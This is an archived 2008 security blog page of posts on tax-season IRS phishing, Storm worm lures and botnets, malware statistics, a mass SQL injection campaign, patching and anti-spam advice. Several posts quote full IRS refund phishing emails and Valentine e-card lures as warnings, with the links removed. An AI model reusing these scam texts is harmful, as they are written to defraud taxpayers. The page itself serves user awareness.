|
Security News and Best Practices for corporate and home users
January 2008 - Posts
-
 As noted in this post, scammers are attempting to trick individuals during the tax season to reveal sensitive information so that it can be misused for privacy or fraudulent reasons. Never take action from the IRS, banks, or other agencies simply based on an email message. Always check these out with the source first.
The HTML and other aspects of this email look legitimate and these messages should be deleted as they are fake.
From: "Internal Revenue Service U.S.A" <refund@usa.gov>
Subject: Important Message From IRS
Date: Thu, 31 Jan 2008
|
|
|
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $93.60. Please submit the tax refund request and allow us 6-9 days in order to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.
To access your tax refund online, please click here (Malicious Numeric IP address in URL Removed)
Regards,
Internal Revenue Service |
|
| |
|
|
|
|
-
As we are entering into a new tax reporting season, scammers are already trying to take advantage of individuals  Folks should be careful of all email messages as they appear to be authentic, but the IRS never contacts folks in that manner.
Also, phone scammers are asking for SSN and other privacy information, that IRS should already have on file anyway. If folks share sensitive information, it can be used by identity thieves to impersonate the victim and obtain money. Always check any request for information with the source when in doubt.
Tis the Season for Tax Return Scams
http://isc.sans.org/diary.html?storyid=3898
http://www.timesheraldonline.com/ci_8108493
QUOTE: A new wave of "phishing" e-mails making the rounds, claiming to be from the IRS, may be the work of scammers trying to capitalize on an economic stimulus package under consideration by Congress, an IRS spokesman said Monday.
"The IRS never sends unsolicited initial e-mails," IRS spokesman Bill Steiner said. Nor does it ever ask for detailed personal and financial information, personal identification numbers, passwords or similar access information for credit cards, banks or other financial accounts, the men said.
Phone scammers are also manipulating individuals
http://www.kmbc.com/news/15152423/detail.html
QUOTE: Scammers, pretending to be IRS agents, are calling unsuspecting people, asking for Social Security numbers and other personal information so a refund check can be sent.
IRS Warning and Recommendations
http://www.irs.gov/newsroom/article/0,,id=170894,00.html
QUOTE: A new variation of the refund scheme may be directed toward organizations that distribute funds to other organizations or individuals. In an attempt to seem legitimate, the scam e-mail claims to be sent by, and contains the name and supposed signature of, the Director of the IRS Exempt Organizations area of the IRS. The e-mail asks recipients to click on a link to access a form for a tax refund. In reality, taxpayers claim their tax refunds through the filing of an annual tax return, not a separate application form.
RECOMMENDATION: These e-mail messages can be forwarded to: phishing@irs.gov
EXAMPLE OF TAX BASED PHISHING ATTACK :
=========================================
Tax Notification
Internal Revenue Service (IRS)
United States Department of the Treasury
Date: 01/28/2008
After the last annual calculations of your fiscal
activity we have determined that you are eligible
to receive a tax refund of $134.80.
Please submit the tax refund request and allow us
6-9 days in order to process it.
A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying
after the deadline.
To access the form for your tax refund, click here
(MALICIOUS WEBSITE LINK).
Regards,
Internal Revenue Service
Document Reference: (92054568).
=========================================
|
-
-
 During the past two years, we have gradually moved from computer virus attacks to more uniquely packaged trojan horse attacks that are being massively spammed. For example, the Storm worm is highly polymorphic and can change it's signature pattern (as measured by MD5 hash totals) on an hourly basis. AV vendors are struggling to handle these constantly changing conditions, as a unique malware agent can be created for each spam run.
Over Five Million unique malware types were created in 2007
http://sunbeltblog.blogspot.com/2008/01/growth-of-malware.html
http://www.darkreading.com/document.asp?doc_id=143424
QUOTE: Experts at AV-Test, an independent testing organization, also reported skyrocketing incidence of malware yesterday. After a detailed count, the organization said it identified nearly 5.5 million different malware files in 2007 -- more than five times as many as in 2006.
Year # of unique samples (MD5) - note these are not cummulative
==============================
1985 564
1986 910
1987 389
1988 1,738
1989 2,604
1990 9,044
1991 18,384
1992 36,822
1993 12,287
1994 28,613
1995 15,988
1996 36,816
1997 137,716
1998 177,615
1999 98,428
2000 176,329
2001 155,528
2002 199,049
2003 178,825
2004 142,321
2005 333,425
2006 972,606
2007 5,490,960
What are MD5 Hash Totals?
http://en.wikipedia.org/wiki/Md5
|
-
 During January 2007, one of Europe's worst Winter storms was used as a means to get folks to view a "news release" being circulated in email. While the headlines were legitimate, many individuals became infected in a new P2P based botnet that featured fast flux server techniques (where clients and servers change roles so rapidly that the true master servers cannot be found).
While most malware attacks recirculate older techniques or ideas, the Nuwar malware authors have been innovative in some of the technical aspects of the design (e.g., fast flux servers, rootkit infections, P2P based botnet, etc). Each storm worm attack should be carefully watched, including e-card attacks that may surface during Valentine's Days or other holidays later this year.
Thanks to Microsoft's MSRT tool that's part of the Patch Tuesday updates, the size of the botnet has been reduced as thousands of PCs have been cleaned. Still, it's envisioned that Storm worm will continue to be active for the foreseeable future.
Storm Worm - Launched one year ago
http://www.f-secure.com/weblog/archives/00001367.html
http://www.theregister.co.uk/2008/01/18/storm_worm_botnet/
http://blog.washingtonpost.com/securityfix/2008/01/unhappy_birthday_to_the_storm.html
Storm Worm overview
http://en.wikipedia.org/wiki/Storm_Worm
QUOTE: The Storm Worm malware (more properly known as a Trojan) strain first surfaced on 17 January 2007, in emails attempting to trick users into visiting maliciously-constructed websites under the guise of messages offering information about the storms ravaging Europe at the time.
Compromised machines, however they are infected, become zombie clients under the control of hackers. The Storm Worm was the first botnet client to be based on a peer-to-peer (P2P) command and control protocol, an approach that makes networks of compromised PCs far more difficult to shut down. Over the last year, the Storm Worm has infected millions of Windows machines around the world.
|
-
The Storm worm with it's fast flux server techniques and other malware are abusing the 5 day grace period associated with registering a new website name. Based on recent trends, millions of domain names are being allocated and then deleted each month. This is why folks need to be careful in going to sites questionable sites based on IP numerical addresses or unusually named sites.
http://www.avertlabs.com/research/blog/index.php/2008/01/24/is-it-domain-tasting-or-domain-misusing/
QUOTE: When a registrar registers a domain name, there is a five-day Add Grace Period (AGP) where he may cancel his request and receive a full credit for the registration fee from the registry. This trend has been gaining popularity since mid 2005, and although it was originally set up for avoiding mistakes, the practice now is frequently abused.
Beside the fact that some domainers use it to track names with a high potential to generate traffic and thus pay-per-click revenues, people who use the fast-flux and rockphish techniques, which we have already discussed here in detail, now use it in proportions that would be interesting to measure. Domain Tasting involves registering names only to release them very quickly and without paying for them. This practice exploded in 2007, and an incredible number of temporary domain names, having definitely been used to carry out malicious activities, were deleted at the end of this add-grace period.
MORE INFORMATION
http://www.avertlabs.com/research/blog/index.php/2007/12/03/from-fast-flux-to-rockphish-part-1/
http://www.avertlabs.com/research/blog/index.php/2007/12/03/from-fast-flux-to-rockphish-part-2/
|
-
If confirmed, this represents the greatest fraud scandal by a single individual of all time. The key issues were too much trust and the lack of checks and balances. While most folks are ethical and trustworthy, companies always need compensating controls that "trust but verify" that all is going well.
Most likely large financial institutions will be looking at their controls even more closely after this scandal. This includes improving classical audit controls like: separations of duties, checks-and-balances, and autonomy levels. These controls are also beneficial to detect and prevent accidental errors as well.
French bank blames trader for $7 billion fraud
Societe Generale to seek new capital; swindle is one of history’s biggest
http://www.msnbc.msn.com/id/22818054/
QUOTE: PARIS - French bank Societe Generale said Thursday it has uncovered a $7.14 billion fraud — one of history’s biggest — by a single futures trader who orchestrated a series of bogus transactions. The fraud destabilized a major bank already exposed to the subprime crisis. France’s second largest bank by market value said it must seek 5.5 billion euros ($8.02 billion) in new capital, and the chief executive offered to resign.
The trader at SocGen was responsible for basic futures hedging on European equity market indices, the company said, making bets on how the markets would perform at a future date. Futures trading began with selling commodities like sugar or oil to be delivered at a specified date. The practice has expanded enormously in recent years to include extremely complex financial instruments, but the company statement said the trader was involved in the more basic forms of hedging.
If confirmed, the fraud would far outstrip the Nick Leeson trading scandal in 1995 that bankrupted British bank Barings. Barings collapsed after Leeson, the bank’s Singapore general manager of futures trading, lost 860 million pounds — then worth $1.38 billion — on Asian futures markets, wiping out the bank’s cash reserves. The company had been in business for more than 230 years.
|
-
As previously noted, a new Valentines theme emerged from the Storm worm Botnet last week and copies were received as noted. This may have been a "test run" to be used closer to Valentine's Day when e-cards might be more prevelant. Further samples haven't been encountered since last week. Users should always avoid all email attachments and links where possible. The Storm worm serves up advanced malware from fast-flux servers (meaning they constantly change), that is difficult to detect and clean.
EXAMPLES OF STORM WORM VALENTINES DAY E-CARD ATTACKS
Date: Thu, 17 Jan 2008 13:12:04 +0400
From: [Sender Removed]
To: Harry
Subject: Words in my Heart
You're In My Thoughts
[Malicious URL using numeric IP address removed]
- - - - - - - - - - - - - - - -
Date: Thu, 17 Jan 2008 19:11:17 +0200
From: [Sender Removed]
To: Harry
Subject: Eternity of Your Love
A Dream is a Wish
[Malicious URL using numeric IP address removed]
|
-
 I started using Mozilla and Opera browsers around 2001, when I started experimenting with Linux as a secondary workstation at work, to learn more about this environment. I started with the full Mozilla suite, which included email client capabilities. Later in 2002, I discovered the Windows beta versions of Mozilla, including Phoenix 0.3 browser (which was installable only in a zip build configuration). Later Firefox, Thunderbird, Seamonkey, and other products emerged from developers.
The competition between Firefox and Internet Explorer has led to improvements in functionality and security for both browsers. Below are links related to Netscape's creation of the Mozilla initiative, which later led to Mozilla becoming the leading open-source technology for web browsers. Personally, I like IE 7, Firefox 3, and Opera 9. Hopefully, innovation and protection will continue for all these products in the future.
Happy Birthday Mozilla!
http://isc.sans.org/diary.html?storyid=3875
QUOTE: Let's just all thank Mozilla for the wonderful browser and market they have created. I've always said diversity is key. It's great that I have been to hundreds of organizations and I can honestly say that each one has had Firefox installed. Maybe not the default browser, but at least had it installed.
January 22, 1998 -- the Beginning of Mozilla
http://weblogs.mozillazine.org/mitchell/archives/2008/01/january_22_1998_the_beginning.html
NETSCAPE ANNOUNCES PLANS TO MAKE NEXT-GENERATION COMMUNICATOR SOURCE CODE AVAILABLE FREE ON THE NET
QUOTE: MOUNTAIN VIEW, Calif. (January 22, 1998) -- Netscape Communications Corporation (NASDAQ: NSCP) today announced bold plans to make the source code for the next generation of its highly popular Netscape Communicator client software available for free licensing on the Internet. The company plans to post the source code beginning with the first Netscape Communicator 5.0 developer release, expected by the end of the first quarter of 1998. This aggressive move will enable Netscape to harness the creative power of thousands of programmers on the Internet by incorporating their best enhancements into future versions of Netscape's software. This strategy is designed to accelerate development and free distribution by Netscape of future high-quality versions of Netscape Communicator to business customers and individuals, further seeding the market for Netscape's enterprise solutions and Netcenter business.
|
-
The alarming statistics noted in this article may be true unfortunately. Some system administrators or DBAs may favor application stability over security risks. These security fixes may seem remote as the firewall or other controls help keep many external risks contained. Still, what if an relational data base attack could trigged from the inside, by a malicious agent found in an email message or by visiting a malicious website. This was highlighted in today's SSWUG newsletter and the good advice offered by the editor is also included below.
Two-thirds of Oracle DBAs don't apply security patches
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9057226
QUOTE: Complexity of task makes admins not want to bother -- Oracle Corp. issues dozens of security patches every quarter, but that doesn't mean database administrators are necessarily implementing them. In fact, a good two-thirds of all Oracle DBAs appear not to be installing Oracle's security patches at all, no matter how critical the vulnerabilities may be, according to survey results from Sentrigo Inc., a Woburn, Mass.-based vendor of database security products.
SSWUG Newsletter - Two-Thirds Do Not Apply Service Packs... WHAT?!
QUOTE: I don't know if you saw it, but there is a study out in Computer World that says that 66% of Oracle DBAs don't apply service packs to their systems. I'm not about to suggest that the percentage is different for SQL Server DBAs, but if it is, or isn't - what's up with that?!
If it's true, it means that DBAs have a short attention span when it comes to remembering slammer and other issues with SQL Server that should never really have happened - things prevented by service packs, but that flourished because service packs weren't installed.
At the time, the issues revolved around the fact that testing and making sure service packs were ready for installation took a long time to deploy. Now, though, things are much better - perhaps not completely a non-issue, but better. Are we still faced with not installing service packs and updates until a system breaks? I hope this isn't the case, but I have a feeling it probably is. I think once systems go behind firewalls, get stable and function that many avoid touching them. It's the old "if it ain't broke, don't fix it."
But... it's not "right." If this is you - perhaps set up a schedule to review and deploy updates - just pick a period of time, like every 6 months, that you can use. Then, you know when that reminder comes up that you need to review the updates, get them tested and applied. Don't just ignore until it breaks, I think we're just collectively asking for trouble if we take that approach.
|
-
-
-
 Microsoft Windows Home Server was announced during CES 2007 just over one year ago. Windows Home Server is designed as a home user server operating system supporting file sharing, back automation and remote access. It is dervied from Windows Server 2003 SP2 and requires a dedicated server PC. It offers good security and functionality for advanced home network users.
This six page article, along with the links below offer good advice on how to get started:
Microsoft Windows Home Server - How to get started
http://www.informationweek.com/news/showArticle.jhtml?articleID=204805989
QUOTE: The question for you is, do you have a home network that connects several PCs, but no backups of all the important data on those PCs? The odds are you do. If so, Windows Home Server may be just the solution you need. This extremely smart server application will back up all those PCs as safely as you want, provide easy access to the files you want to share on your network (like music and media files), and even give you remote access to your files and computers across the Internet.
That may all sound too good to be true, but believe it. Windows Home Server is a great application. It does have what you might consider a downside: you have to dedicate a PC to running it. But while you might think of laying out for another computer as a problem, to Microsoft that's an opportunity. In fact, Microsoft thinks there are perhaps as many as 40 million people just like you out there, which is its estimate of the market for its Window Home Server product.
MINIMUM HARDWARE REQUIREMENTS
(it's always good to try to double these if possible)
The following minimum specs are needed:
-- 1.0 GHz Intel Pentium 3 (or equivalent) processor
-- 512 MB RAM
-- 80 GB internal hard drive as primary drive
-- 100 Mbit/s wired Ethernet
-- Bootable DVD drive
-- Display
-- Keyboard and mouse
SOME KEY DESIGN AND USAGE POINTS FROM THE ARTICLE
1. Determine your needs in home networking multiple PCs together and devote a PC for the Windows Home Server environment
2. Determine backup and access usages for all computers and devices (e.g., printers) accessing this environment
3. Because Home Server has to make a wired connection to your router, the physical installation must be nearby and may be an issue if there is limited space.
4. Home Server works automatically only with Windows PCs that you can install the client software on. Linux boxes and Macs can access and save files to the server's shared folders, but Home Server won't automatically back them up.
5. The more intensively you use Home Server, the more you'll find that your network's speed can be a bottleneck. Basic 802.11b/g wireless is OK for doing backups of a couple of PCs, but if you get into using Home Server as a media server, or even backing up significant volumes of frequently changing data
6. Home Server by itself isn't a complete backup strategy. Getting your data backed up to a different computer onsite is good. Better would be to back it up offsite.
Additional resources can be found here:
Microsoft's Windows Home Server - Home Page
http://www.microsoft.com/windows/products/winfamily/windowshomeserver/default.mspx
Microsoft's Windows Home Server - Key Features
http://www.microsoft.com/windows/products/winfamily/windowshomeserver/features.mspx
Windows Home Server - Technet Blog Home Page
http://blogs.technet.com/homeserver/
What's Hot from WinHEC - Windows Home Server
http://www.informationweek.com/blog/main/archives/2007/05/whats_hot_from.html
Microsoft Windows Home Server - Wikipedia information and links
http://en.wikipedia.org/wiki/Windows_Home_Server
|
-
F-Secure shares an analysis of how the Storm Worm botnet might be used in hosting a phishing attack to gain sensitive privacy or bank account information.
Storm Worm - Phishing attacks from the Botnet
http://www.f-secure.com/weblog/archives/00001359.html
QUOTE: Last night there was a phishing run. The IP address of the site was changing every second or so. The server was an active fast flux site and was hosted within a botnet. Interestingly, when we picked out a random IP address from the list and resolved that address to other sites hosted in the past, we found something familiar (e.g., hellosanta2008 and postcards-2008).
This sounds like Storm. So somebody is now using machines infected with and controlled by Storm to run phishing scams. We haven't seen this before. October brought evidence of Storm variations using unique security keys. The unique keys will allow the botnet to be segmented allowing "space for rent". It looks as if the Storm gang is preparing to sell access to their botnet.
|
-
As I've been using SQL-Server since it came out in 1994, the SSWUG community is an excellent resource, I've been a member of for years. In today's newsletter, they are highlighting a major new attack that may have affected up to 70,000 servers and 94,000 unique web addresses It is vital to stay up-to-date on patches and AV protection. More importantly the use firewalls, web security techniques, and security testing are all important in ensuring these malicious injection attacks are properly blocked.
SSWUG.ORG Newsletter - (SQL-Server Users Group)
http://www.sswug.org/nlarchive.asp?odate=1/10/2008
QUOTE: Injection again ... I don't know if you've seen the reports, but there is a "mass attack" (my term) that has been going on with an automated SQL Injection engine of sorts that's out looking to find login and registration systems, then attempt SQL injection against the site.
What's unique about this is that it's a very broad attack, not a hacker trying to breach a system on a system-by-system basis as has traditionally been the case. This means that to turn this thing loose on all types of sites is "just" a matter of replicating the engine and letting it run amuck. You can see that this could be a (rather successful) test brute-force approach to trying out just about every other attack that has, to-date at least, been based on a person doing the work. Traditional injection is about interpreting results, seeing what's returned by the site or application and tweaking your approach. With this approach - a forced and automated one - the possibility for coming in on multiple attack vectors simultaneously is very possible.
If you're not testing your systems, I highly recommend you consider it. There are some solid tools and services out there that can help you learn a lot about what vulnerabilities you may have, and they generally help you understand both how they work and how to prevent them. With this go-round on the hacker attacks on injection, I've seen reports of as many as 70,000 servers infected. That's a big number and the infections are not passive - they're malicious injection of javascript code. Take the steps now to learn what can be done to and for your systems.
Additional links are noted below:
Mass exploits with SQL Injection
http://isc.sans.org/diary.html?storyid=3823
http://isc.sans.org/diary.html?storyid=3810
QUOTE: It turned out that there is an automated script or a bot exploiting SQL injection attacks in vulnerable web applications. I remembered that I saw the very same attack appearing back in November last year but it was not this wide spread – it appears that the attacker improved the crawling/attacking function of his bot so he managed to compromise more web sites.
Mass hack infects tens of thousands of sites
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9055858
QUOTE: On Saturday, said Thompson, the number of sites that had fallen victim to the attack numbered more than 70,000. "This was a pretty good mass hack," said Thompson, in a post to his blog. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared." ... However, many of those sites -- which as of this morning numbered more than 93,000, according to a quick Google search -- had not been cleaned.
Register Article
http://www.theregister.co.uk/2008/01/08/malicious_website_redirectors/
QUOTE: At time of writing, more than 94,000 URLs had been infected by the fast-moving exploit, which redirects users to the malicious domain
Additional References
http://www2.csoonline.com/blog_view.html?CID=33430
http://www.modsecurity.org/blog/archives/2008/01/index.html
http://explabs.blogspot.com/2008/01/so-this-is-kind-of-interesting.html
|
-
The two articles below provide excellent advice on how to improve sluggish performance issues with Windows Vista, as it's a different environment than Windows XP 
Windows Vista - 12 Tips To Boost Your PC's Performance
http://www.informationweek.com/news/showArticle.jhtml?articleID=204701251
QUOTE: Soon after Windows Vista came out, many suggestions for tweaking the operating system to improve performance emerged. Unfortunately, most of those tweaks turned out to be pretty disappointing: they either provided the illusion of better performance but did nothing of substance, or they were rehashes of existing Windows XP tips that might not even be valid on Vista.
Still, there are plenty of things that can be done to make Vista run better. Over the past several months I've kept an eye peeled as to what actually works, what doesn't, and why. With less work than you might think, it's entirely possible to have Vista running quite snappily.
SUMMARY OF VISTA TUNING RECOMMENDATIONS
1. Add more memory (esp. when you buy a new system - 2GB or more)
2. Find Out What's Hogging Your System (analyze impacts to performance)
3. Get Rid Of Anything You Don't Need (start-ups)
4. Tune The Vista Search Index (turn off if you don't use it)
5. Tune System Restore (once per week instead of daily if space is limited)
6. Use A Second Hard Drive To Parallelize Operations
7. Tune Defrag, But Not To Excess
8. Try ReadyBoost, But Don't Throw A Lot Of Money At It (USB Flash drives for caching might help)
9. Install Your Updates (e.g., 938194, 938979, and 941649, which should be installed in that order, and thie will be included eventually in SP1 when available later this year)
10. Check For Other Driver Updates
11. Tune Windows Defender
12. Turn off some of the "Eye Candy" (e.g., Aero flying-windows affects)
Below is also another good thread that shares tips for improving Vista performance:
CNET Forums - Tips on improving Vista performance
http://forums.cnet.com/5208-10149_102-0.html?forumID=7&threadID=275745
|
-
Below are some ideas shared in a security forum this morning. Please remember that there are no magic formulas to eliminate spam. Spam represents about 70-90% of all email traffic on the Internet.
HOME USERS
- Be careful online and safeguard your privacy (e.g., don't reveal your email address except when you have to and only then to a trusted site)
- Ensure your system is malware-free. It is always important to ensure no viruses, spyware, or other malware is present that could transmit these addresses to spammers.
- Don't post email addresses in online forums, social networking websites, or untrusted web forms. For example, if you directly share an email address within a public post, there are "robotic spiders" which randomly read webpages and may harvest them. You're okay registering to forum, as ADMINS lock down and hide email registration addresses
- Never reply to spam to opt out links at the bottom of the messages. Spammers know they've got a "good address" and these rascals aren't ethical enough to remove you either. Finally the spam opt-out URL may also be malicious as well
- Use bcc (blind carbon copy) or group name techniques when sending email to others (so spammers don't hit the jackpot). Educate and encourage friends and family to do like-wise
- If you get overloaded on an email account with spam, change to a brand new email account to start the process all over again.
- Technical safeguards like spam filtering within an email product (e.g., Outlook, Thunderbird), or even a separately purchased spam filtering package may help. These work well, although some validate email messages may be caught in the spam filters and thus they should be reviewed prior to emptying and deleting all contents.
CORPORATE USERS
- Web filtering + AV + Content filtering software in the DMZ or firewall are highly recommended (e.g., Corporate version of Baracuda; multiple AVs, etc)
- MIME compliancy testing - This standard can be used in the DMZ to filter out non-compliant messages
- Security Awareness - Teach spam avoidance concepts to your user community
|
-
 Microsoft has issued a few important security updates that should applied promptly. These updates worked well on both of my XP PCs at work and will require a reboot.
Microsoft Security Updates - January 2008
http://www.microsoft.com/technet/security/bulletin/ms08-jan.mspx
* MS08-001 - Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
* MS08-002 - Vulnerability in LSASS Could Allow Local Elevation of Privilege (943485)
Microsoft also released Non-Security, High-Priority Updates on MU, WU, and WSUS:
- Five non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
- Two non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.
|
-
 Security vendors are always trying to hit a moving target when it comes to malware attacks. During 2007, the number of new malware agents increased dramatically. Much of this is attributed to highly polymorphic malware packaging techniques and unique "waves" of trojan horse attacks. For example, trojan horse construction kits allow malware to be packed using numerous available algorithms for compression. Also, Storm worm malware patterns found on server templates changed on an hourly basis according to one report I had read.
While we didn't have 250,000 brand new unique viruses as F-Secure shares, we had thousands of "close cousins" within the same virus family. Trojan horses are unique attacks that don't replicate on the infected PCs and have been around since the dawn of malware. During 2007, there was "wave after wave" of unique trojan horse attacks (including the Storm worm and other botnets). Each wave represents a unique pattern AV vendors had to provide coverage for during each round of attacks.
Unfortunately, we'll see more of the same (if not worse) in 2008. I had also read that only 30% of AV vendors have signatures ready within 24 hours of an attack wave, it is imperative to always follow those best practices of avoidance on any email that appears suspicious (even from someone you know).
AVERT - A banner year for malware, digital threats and the security industry
http://www.avertlabs.com/research/blog/index.php/2008/01/07/a-banner-year-for-malware-digital-threats-and-the-security-industry/
QUOTE: On January 2, 2007, we posted the first DAT files (4930) of the new year. On that day, the public count of threats detected stood at 221,935. Fast-forward to December 31, when we released the last DAT (5196) of 2007, and the public count of threats detected finished at an almost unbelievable 357,820. That’s a total of 135,885 unique threats that we at Avert Labs identified throughout 2007. But let me put that into further context:
• 372 new detections per calendar day in 2007
• 527 new detections per business day in 2007
• One driver written every 4 minutes in 2007
• 38% of all detections were added this year.
• 25,438 more detections were added this year than in 2005 and 2006 combined. (Those two years totaled 110,447.)
F-Secure - Up to 1/2 Million Malware Detections
http://www.f-secure.com/weblog/archives/00001351.html
QUOTE: Our recent Data Security Wrap-up predicted we'd reach half-a-million malware detections by the end of the year. And in fact — we did reach 500K of detections during the last week of December. Quite the way to end 2007. So now we've had a bit of rest and are recharged for the year ahead. That's a good thing too because we predict that 2008 will be busier than ever.
F-Secure - IT Security Threat Summary for H2 2007
http://www.f-secure.com/2007/2/index.html
QUOTE: What previously took twenty years to accumulate — was now accumulated in just one year
At the start of 2007 — our number of malware detections equaled a quarter-million. At the end of 2007, the estimates are to be equal to half-a-million.
This graph from F-Secure illustrates how difficult 2007 was for the providers of AV protection:
|
-
A "false positive" is where legitmate programs are detected as a virus. Virus signature strings are only dozens of characters long and sometimes a legitimate script or executable might have code closely resembling the virus somewhere within the larger file itself. DAT 5198 was released promptly by AVERT Labs to correct this issue. Most everyone should have updated to 5198 automatically. If anyone is on DAT 5197, they should move to this corrected DAT. Please use the HELP / ABOUT on the Shield or background scanner to find out which version you are using.
McAfee DAT 5197 - Creating JS/Exploit False Positives
http://isc.sans.org/diary.html?storyid=3803
QUOTE: Some users reported that their AV was detecting JS/Exploit-BO virus, on sites like ESPN and Friendster, for instance. The problem is with the McAfee AV. McAfee just released an Emergency DAT to fix the false on some JavaScripts, detecting as JS/Exploit-BO on virus database (DAT file) 5197 released today.
|
More Posts Next page »
|
|
|